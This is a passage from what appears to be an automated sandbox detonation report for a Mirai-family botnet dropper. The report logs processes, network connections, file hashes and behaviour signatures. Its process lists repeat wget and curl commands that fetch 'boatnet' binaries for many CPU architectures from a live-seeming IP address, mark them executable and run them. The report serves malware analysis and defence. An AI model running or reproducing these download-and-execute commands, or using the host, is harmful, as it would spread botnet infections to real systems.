/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-XTVJnW WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp

Files

/tmp/boatnet.x86

MD5 895badd48eed0c0e0ba14e8d5967e7bb
SHA1 3c4c22665e6197841f7e68f941a4a27dca3d4d8d
SHA256 e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4
SHA512 dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7

/tmp/WTF

MD5 e3206d28c93769f5acb5e1e1d5b5f219
SHA1 198b56e1df06819e1141c1d6e8f7ad7d1646194c
SHA256 cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab
SHA512 dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503

memory/747-1-0x00400000-0x00451a58-memory.dmp

/tmp/WTF

MD5 d94c95baa8be09e30fcdc154241477c8
SHA1 d0b682898bd94b01afb6ad2f4fb813197f6a0985
SHA256 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6
SHA512 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9

/tmp/WTF

MD5 f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1 750274b02d5f5b00026a4f55b020f4285c693533
SHA256 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA512 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

/tmp/WTF

MD5 a8f502a6fb3b7b940e922c951d9e493a
SHA1 fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512 e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

/tmp/WTF

MD5 fb08806a49f2c5aa8f8ea71c0ca40395
SHA1 411ae81e99b9c3ec9d27514a7c18cb5c63189b22
SHA256 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c
SHA512 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-09 04:14

Reported

2024-11-09 04:17

Platform

debian9-mipsel-20240418-en

Max time kernel

149s

Max time network

139s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/896/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/659/cmdline /tmp/WTF N/A
File opened for reading /proc/666/cmdline /tmp/WTF N/A
File opened for reading /proc/712/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/882/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/665/cmdline /tmp/WTF N/A
File opened for reading /proc/686/cmdline /tmp/WTF N/A
File opened for reading /proc/700/cmdline /tmp/WTF N/A
File opened for reading /proc/706/cmdline /tmp/WTF N/A
File opened for reading /proc/842/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/411/cmdline /tmp/WTF N/A
File opened for reading /proc/870/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/663/cmdline /tmp/WTF N/A
File opened for reading /proc/707/cmdline /tmp/WTF N/A
File opened for reading /proc/708/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/705/cmdline /tmp/WTF N/A
File opened for reading /proc/879/cmdline /tmp/WTF N/A
File opened for reading /proc/883/cmdline /tmp/WTF N/A
File opened for reading /proc/897/cmdline /tmp/WTF N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/curl N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/wget N/A
File opened for modification /tmp/boatnet.spc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/curl N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]

/bin/cat

[cat boatnet.arm6]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]

/bin/cat

[cat boatnet.arm7]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]

/bin/cat

[cat boatnet.ppc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]

/bin/cat

[cat boatnet.spc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]

/bin/cat

[cat boatnet.m68k]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]

/bin/cat

[cat boatnet.sh4]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:3778 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp
GB 77.221.151.63:80 77.221.151.63 tcp

Files

/tmp/boatnet.x86

MD5 895badd48eed0c0e0ba14e8d5967e7bb
SHA1 3c4c22665e6197841f7e68f941a4a27dca3d4d8d
SHA256 e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4
SHA512 dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7

/tmp/WTF

MD5 e3206d28c93769f5acb5e1e1d5b5f219
SHA1 198b56e1df06819e1141c1d6e8f7ad7d1646194c
SHA256 cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab
SHA512 dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503

/tmp/WTF

MD5 d94c95baa8be09e30fcdc154241477c8
SHA1 d0b682898bd94b01afb6ad2f4fb813197f6a0985
SHA256 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6
SHA512 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9

/tmp/WTF

MD5 f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1 750274b02d5f5b00026a4f55b020f4285c693533
SHA256 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA512 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

/tmp/WTF

MD5 a8f502a6fb3b7b940e922c951d9e493a
SHA1 fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512 e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

/tmp/WTF

MD5 fb08806a49f2c5aa8f8ea71c0ca40395
SHA1 411ae81e99b9c3ec9d27514a7c18cb5c63189b22
SHA256 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c
SHA512 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3

memory/839-1-0x00400000-0x00452a58-memory.dmp